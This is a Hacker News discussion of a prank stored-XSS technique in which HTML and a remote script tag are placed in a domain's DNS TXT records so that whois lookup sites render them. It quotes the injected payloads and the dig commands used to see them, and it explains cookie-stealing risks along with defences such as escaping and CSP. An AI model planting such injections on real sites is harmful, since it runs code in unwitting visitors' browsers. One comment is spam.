
TXT Record XSS - ryanskidmore
http://who.is/dns/jamiehankins.co.uk
======
mrb
I am half serious, but how about making HTML served in TXT records a standard
trick for serving small web pages very quickly? There are way fewer network
round trips:

    
    
      1. DNS query for TXT record for example.com
      2. DNS reply with HTML content
    

Compared with the traditional 7 steps:

    
    
      1. DNS query for A record for example.com
      2. DNS reply with x.x.x.x
      3. TCP SYN to port 80
      4. TCP SYN/ACK
      5. TCP ACK
      6. HTTP GET
      7. HTTP reply with HTML content
    

It would also make the content super-distributed, super-reliable, as DNS
servers cache it worldwide (and for free so it would reduce hosting costs :D).
Also TXT records can contain more than 255 bytes as long as they are split on
multiple strings of 255 bytes in a DNS reply.

Again, I am only half serious, but this is an interesting thought
experiment...

Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no
longer than the DNS TTL to propagate: the TTL is under your control; you could
set it to 60 seconds if you wanted. It is a common, false misconception that
_many_ DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I
forget) ran an experiment and demonstrated that across tens or hundreds of
thousands of clients wordlwide, 99% of them saw DNS updates propagated within
X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were
ignoring it.

~~~
TeMPOraL
> _I am half serious_

Good. Still, it needs to be pointed out. This idea is an awesome hack to show
how can you piggyback on existing infrastructure to make it work as something
it was not intended to.

But it absolutely, terribly sucks at anything practical. Actually, it's a
_non-solution_. Here's why.

> _There are way fewer network round trips:_

> _1\. DNS query for TXT record for example.com_

> _2\. DNS reply with HTML content_

Let me show an exactly equivalent alternative implementation of the above
concept.

    
    
        1. HTTP GET x.x.x.x/example
        2. HTTP reply with HTML content
    

Both of them require you to do exactly the same steps - that is, connect to a
_hardcoded port_ of a server at a _hardcoded IP address_ , request a _user-
defined_ resource, receive and display reply. DNS is not magic, IP addresses
of DNS servers are hardcoded in your network configuration and/or in your
router configuration and/or in your ISP configuration.

I know you're half-serious with this idea, but I'm going to play along. So to
continue with the interesting thought experiment... if people were to start
actually using DNS records to smuggle websites, they'd quickly overwhelm the
capabilities of the DNS network, so the reliability and free hosting would
quicky go out of window, along with all hope of ever having anything even
resembling consistency in the Internet.

So yeah; a nice hack, but kids, don't try to deploy it at scale ;).

~~~
paulfurtado
> _Both of them require you to do exactly the same steps - that is, connect to
> a hardcoded port of a server at a hardcoded IP address, request a user-
> defined resource, receive and display reply. DNS is not magic, IP addresses
> of DNS servers are hardcoded in your network configuration and /or in your
> router configuration and/or in your ISP configuration._

The steps are not _exactly_ the same. Any sensible ISP give you at least two
redundant DNS servers with your DHCP response and most public DNS providers
also give you multiple redundant servers. When you do a DNS lookup, your OS or
browser handles failover between the DNS servers automatically, client side.
When accessed by IP address, as you've demonstrated, HTTP offers no client-
side failover mechanism built into web browsers to fall back to a different
IP.

It's additionally important to note that architecturally, DNS servers are far
more scaleable than most HTTP servers. They don't run anywhere near as much
code per request and don't require the overhead of TCP or HTTP.

Note that I'm also not encouraging using DNS instead of HTTP for serving
websites, I'm just pointing out that DNS is a more reliable technology and has
client-side failover mechanisms so the pros which mrb listed are very real.

------
JamieH
So uh. This works on a few websites. A couple I've found

[http://dig.whois.com.au/dig.php?dom=jamiehankins.co.uk&type=...](http://dig.whois.com.au/dig.php?dom=jamiehankins.co.uk&type=ALL&submit=Dig+Lookup)

[http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....](http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage)

~~~
giancarlostoro
I'm guessing nobody else noticed the Rick Roll in there too?

~~~
BuildTheRobots
As the script was just bouncing the search box at the start I a) assumed it
was deliberate and b) expected them to start trying to sell me domains.

The rickroll was the first bit I noticed o_0

------
kazinator
Since there is very little discussion in the link, pardon me for stating what
may be obvious to some, but not necessarily everyone.

The point here is that:

1\. DNS TXT records can contain HTML, including scripts and whatever.

2\. Domain registrants can publish arbitrary TXT records.

3\. TXT records can appear in pages generated by web sites which serve, for
instance, as portals for viewing domain registration information, including
DNS records such as TXT records.

4\. Thus, such sites are vulnerable to perpetrating cross-site-script attacks
(XSS) on their visitors if they naively paste the TXT record contents into the
surrounding HTML.

5\. The victim is the user who executes a query which finds the malicious
domain which serves up the malicious TXT record that is interpolated into the
displayed results. The user's browser executes the malicious code.

Thus, when you are generating UI markup from pieces, do not trust any data
that is pulled from any third-party untrusted sources, including seemingly
harmless TXT records.

~~~
nhstanley
Thanks for explaining. I know HN is traditionally programmer/programming
focused, but some of us come from other areas and only have limited experience
with such topics. It's very common for me to enter a thread about a security
vulnerability, for example, and think "wait, how big of a deal is this?"

------
ryan-c
I enumerated all IPv4 PTR records a few years back, and I saw a couple XSS
things there as well. If anyone wants to host that data set somewhere, let me
know, would be interesting to see what others do with it.

Edit: I found my data and have a grep running on it, will share what turns up.

Edit2: Somewhat less exciting than I remember:

$ fgrep -- '>' *

x.x.101.130.csv:1298607746,155.92.101.130,<hostname>.nebula.msoe.edu.

x.x.110.35.csv:1298587462,41.191.110.35,www.ahnigeria.org\032<[http://www.ahnigeria.org/>](http://www.ahnigeria.org/>).

x.x.126.67.csv:1298594206,75.127.126.67,\032>.

x.x.229.74.csv:1298608599,139.78.229.74,<hostname>.suites.osuit.edu.

x.x.39.239.csv:1298594005,129.89.39.239,<hostname>.uits.uwm.edu.

x.x.49.198.csv:1298613894,195.164.49.198,test.str!\@#\$%^&*\\(\\)}{\":]['><.,end.domain.test.pl.

x.x.49.199.csv:1298613720,195.164.49.199,test.str<hr><br>end.domain.test.pl.

x.x.49.206.csv:1298603066,195.164.49.206,test.str<hr><bR>omain.test.pl.

x.x.88.109.csv:1298606801,95.211.88.109,ilo.>.88.211.95.in-addr.arpa.

~~~
finnn
How big is it? If you put up a torrent I'll seed it...

~~~
jonknee
Likewise, I have a gigabit internet connection and plenty of extra space.

------
philip1209
I added FartScroll.js from the Onion to my text records:

[http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=A...](http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=ALL&submit=Dig+Lookup)

~~~
elwell
Wow, I think they fixed that escaping problem a few minutes ago.

~~~
philip1209
I think some of the sites escape semicolons only. Pure script loading isn't
broken, but trying to code in the txt may break.

~~~
elwell
But I tried your link recently and it no longer works.

~~~
philip1209
Oh you're correct - they did update it. It still works on a few other sites.

------
SEJeff
From any Linux (or probably OS X) workstation / server, you can run the
command "host -t TXT jaimehankins.co.uk" ie:

$ host -t TXT jamiehankins.co.uk

;; Truncated, retrying in TCP mode.

jamiehankins.co.uk descriptive text "<iframe width='420' height='315'
src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0'
allowfullscreen></iframe>"

jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

jamiehankins.co.uk descriptive text "<script
src='//peniscorp.com/topkek.js'></script>"

jamiehankins.co.uk descriptive text "google-site-
verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"

~~~
pkinsky
This is hilarious, but what's up with this line? >jamiehankins.co.uk
descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

Why is mandrillapp.com (tranactional email startup) included?

~~~
JamieH
It's my personal domain, I use mandrill for some stuff.

~~~
SEJeff
Hell of a good prank dude, well played sir!

------
kehrlann
This is hilariousy, but could this potentially be a real threat to anything ?

~~~
bsamuels
idk why youre getting downvoted because it's a good question and people need
to ask more security questions.

Any website I can inject malicious javascript into, I can steal your cookies
from (assuming the httponly flag isn't set on the cookie).

If you were logged into one of these whois sites and they didnt have the
httponly flag set on your auth cookie, an attacker could send you to a page on
the site that contains malicious javascript that could phone home with your
auth cookie, letting the attacker hijack your session.

You can defend your own websites from these kinds of attacks by setting up a
Content Security Policy and using the 'httponly' flag on auth cookies.

[http://en.wikipedia.org/wiki/Content_Security_Policy](http://en.wikipedia.org/wiki/Content_Security_Policy)

~~~
lifeformed
Another attack is to rewrite the webpage to show the official login screen for
that site, and record their password when they enter it.

------
AsakiIssa
Wasn't expecting that at all! Had several tabs opened and was really confused
for a few seconds while I tried to find the tab with 'youtube on autoplay'.

Firefox needs to show the 'play' icon for the audio tag.

~~~
vlunkr
For what it's worth, Chrome tells you which tab audio is playing from, it's
nice.

~~~
pipeep
I think Chrome is able to do this because it separates tabs into processes,
but I don't think there's a good way for Firefox to do it since everything is
in a single process.

[https://bugzilla.mozilla.org/show_bug.cgi?id=486262](https://bugzilla.mozilla.org/show_bug.cgi?id=486262)

~~~
general_failure
I don't think this has to do with multiprocess. The instance of HTML engine
(geckk?) just needs to track who used the audio API.

~~~
cryptoz
I think the problem with that is it doesn't work with Flash audio. With
multiprocess browsers, the Flash audio can be associated with a tab, but
that's awkward/not possible if everything is in the same process.

~~~
path411
Chrome didn't have this feature for a very long time, and if anything sounded
like it was actually harder because of how Chrome handles their processes.

------
ryanskidmore
Who.is have fixed it now, but you can still see it in action over at
archive.org

[https://web.archive.org/web/20140918191824/http://who.is/dns...](https://web.archive.org/web/20140918191824/http://who.is/dns/jamiehankins.co.uk)

~~~
tacotime
oh my god, it's even more entertaining with the wayback machine's page header.

------
garazy
I've found about 80 TXT records with <script tags in them - most of them look
like the person not understanding where to paste a JavaScript snippet over XSS
attempts, here's all of them -

[http://builtwith.com/script-tags-in-TXT-
records.txt](http://builtwith.com/script-tags-in-TXT-records.txt)

There's a few that are "13h.be/x.js" that look like someone trying this out
before.

------
jedberg
Come on people, this is so basic. If you didn't generate the data, don't
display it on your web page without filtering it. It blows my mind that this
isn't just everyone's default.

~~~
homakov
Yeah, nothing clever at all. Tons of ways for user input, and this one just
yet another one.

------
colinbartlett
Bravo, I just embarrassed myself in a very quiet meeting.

------
rbinv
Clever. I didn't get it at first.

Never trust user input.

Edit: See
[http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki...](http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehankins.co.uk&type=TXT&submit=Resolve)
for the actual code.

~~~
dspillett
_> Never trust user input._

Never trust _any_ input. I think this is a case where people assume that is
isn't pure user input because is would have already been
parsed/checked/verified.

"Oh, its in the DNS system so it must be safe" is worse then "well, it came
from our database so it should be fine". Don't even trust something coming out
of your own database. You never know what various input checking bugs might
have accidentally let in over time.

~~~
arenaninja
This is only too true! At work we do CRUD projects, which means user input
gets stored in the database. I almost always break other people's work by
adding HTML tags to the inputs, navigating back to the page, and seeing markup
that shouldn't be there. Even database output needs to be sanitized

~~~
peterwwillis
Database output is application input. All forms of input need to be sanitized,
period.

------
toddgardner
The most clever exploit of XSS I've ever seen. Beautiful. Bravo.

------
JamieH
Still working here if anyone is yet to see it.

[http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....](http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage)

------
Sanddancer
Given how many whois sites cache results, I wonder how many of them are also
vulnerable to SQL injections...

------
elwell
In playing around with this hack, I discovered that Dreamhost doesn't properly
escape TXT records in their admin interface when modifying DNS records. I put
an iframe in and it shows the box but the src is removed; it also killed the
page at that point so I'm unable to remove it...

~~~
Sanddancer
Add the domain to your hosts file to make it not resolve, that should fix it.

~~~
elwell
"the page" referred to dreamhosts admin page

------
mike-cardwell
A while ago I experimented with adding stuff to the version.bind field in
bind. Just updated it:

mike@glue:~$ dig +short chaos txt version.bind @198.211.125.252

"<iframe width='420' height='315'
src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0'
allowfullscreen></iframe>"

I put this in my named.conf:

version "<iframe width='420' height='315'
src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0'
allowfullscreen></iframe>";

This site is vulnerable:

[http://dnscheck.pingdom.com/?domain=grepular.com](http://dnscheck.pingdom.com/?domain=grepular.com)

Although takes a minute before it kicks in. I did report it to them at the
time, but never got a response.

------
bwy
Wish there was a warning, because I accidentally clicked this link in class
just now.

~~~
iLoch
Don't browse with your volume turned up? How do you assume you wont be
interacting with any pages that may produce noise?

------
0x0
Can it be done with CNAME and SRV records too?

------
homakov
XSS on a shitty website not doing trivial sanitization gets 900 points on HN,
oh guys you are disappointing me so much.

------
Thaxll
It has nothing to to do with TXT record, it's just the website that render
html. It could be any source.

~~~
jonknee
It has everything to do with the TXT record... Every XSS could be summed up
with "just the website that renders HTML", but that's pretty much the point.
TXT records aren't often thought of as input and as you can see several sites
made that mistake of assumption.

------
gsharma
Not sure how Trulia handles input for its usernames, but at one point I was
able to do this [http://www.trulia.com/profile/-iframe--home-buyer-loleta-
ca-...](http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-2860517)

------
sidcool
I opened this link on my Android's Chrome browser. The top search text input
started wildly convulsing. First I thought the post was about that. But I
didn't really get what this is about.

~~~
ccorcos
i don't really get it either

------
sanqui
Looks like the who.is site has patched the exploit up a few minutes ago.

~~~
kk3399
yes, but not fixed here yet -
[http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....](http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage)

------
js2
All editors should, upon save, put up the following prompt:

"I acknowledge the code just written does not trust its input, under penalty
of being whipped by a wet noodle."

But I guess folks would just click through.

Sigh.

------
Cance
For more information, visit this site >>>>>>>
[http://getformulat10.com/](http://getformulat10.com/)

------
gcr
Warning: this page links to (loud!) automatic playing audio.

------
tekknolagi
This is hysterical.

------
indielol
Wouldn't this make it super easy for Google to ban (show the security warnings
in Chrome) the domains?

------
nerdy
Best POC ever.

------
_RPM
When I went to the page, it started playing music. I find that very
frustrating and annoying.

~~~
wittrock
That's the point--who.is won't play music by itself. Its lookup of the DNS
records of jaimehawkins.co.uk injected the music into the page.

~~~
_RPM
Oh I see. This makes sense. This doesn't seem challenging to prevent. A simple
replacement of characters on the HTML entity table would have prevented this
instead of putting arbitrary text onto standard output.

~~~
finnn
Correct. The purpose of this post is to demonstrate yet another class of
website that does not validate user input.

------
bdpuk
I've seen similar examples with HTTP headers and sites that display those,
nice angle.

------
general_failure
Well played sir, very well played

------
thomasfl
Finally somebody found a way to put html injection on to good use.

------
wqfeng
Could anyone tell me what's about? I just see a DNS page.

~~~
grimtrigger
It was fixed. But if you look ctrl+f "peniscorp" and you'll see a script that
was injected on the page

------
ginvok
Aaaand now I'm deaf :) Gotta learn sign language

------
iamwil
How does this work?

~~~
er0k

       jamiehankins.co.uk.	33	IN	TXT	"<script src='//peniscorp.com/topkek.js'></script>"
    
       jamiehankins.co.uk.	33	IN	TXT	"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

------
tedchs
FYI it looks like who.is fixed the XSS bug.

------
ing33k
good hack but really stupid of me to click it directly :\

------
PaulSec
I wonder how this got so much points.. Reflected XSS in 2014, yeah..

------
himanshuy
What's up with the search box?

~~~
MiguelHudnandez
That is from topkek.js. Pretty clever! It plays the harlem shake song. One
element shakes by itself until the second phase of the song, then lots of
other elements start shaking.

Cleverness aside, it is practical when looking for XSS vulnerabilities because
it's _very obvious_ when you've succeeded in injecting your code.

------
zobzu
That made me laugh, good one :)

------
notastartup
man...I woke up and got a dose of surprise....love this song.

------
r0m4n0
isn't this technically illegal to demonstrate haha?

~~~
__david__
Why on earth would it be illegal?

~~~
r0m4n0
dam, that got downvoted into oblivion haha. honest question...

although i dont believe it should be, a third party injecting javascript to
demonstrate an exploit might be...

~~~
maaaats
He hasn't injected anything. It's just his public DNS record that this page
has chosen to display without sanitizing.

~~~
pbhjpbhj
I imagine the UK Computer Misuse Act (eg at Section 3,
[http://www.legislation.gov.uk/ukpga/1990/18](http://www.legislation.gov.uk/ukpga/1990/18))
probably covers it if the person who altered the TXT field does so to cause
websites to load code on purpose, that purpose being for example to impair
(Section 3(2)(a)) the running of the computer [causing Rick Astley to play,
defo counts!] - but it can be read to cover pretty much anything.

Similarly I imagine something like the CFAA (18 USC 1030) probably has broad
enough clauses to make this sort of action technically illegal, at least in
some cases? But I'm out of my depth on that one.

~~~
r0m4n0
at least the UK has something somewhat specific (and actually fits XSS quite
well).

CA 502c just says: "(3) Knowingly and without permission uses or causes to be
used computer services" amongst other very broad subsections

[http://support.piercecollege.edu/1521a/References/California...](http://support.piercecollege.edu/1521a/References/California%20Penal%20Code%20Computer%20Crimes%20Section%20502.aspx)

------
st3fan
Wonderful!

------
sprkyco
Luckily it does not work on my normal browser:
[https://www.whitehatsec.com/aviator/](https://www.whitehatsec.com/aviator/)

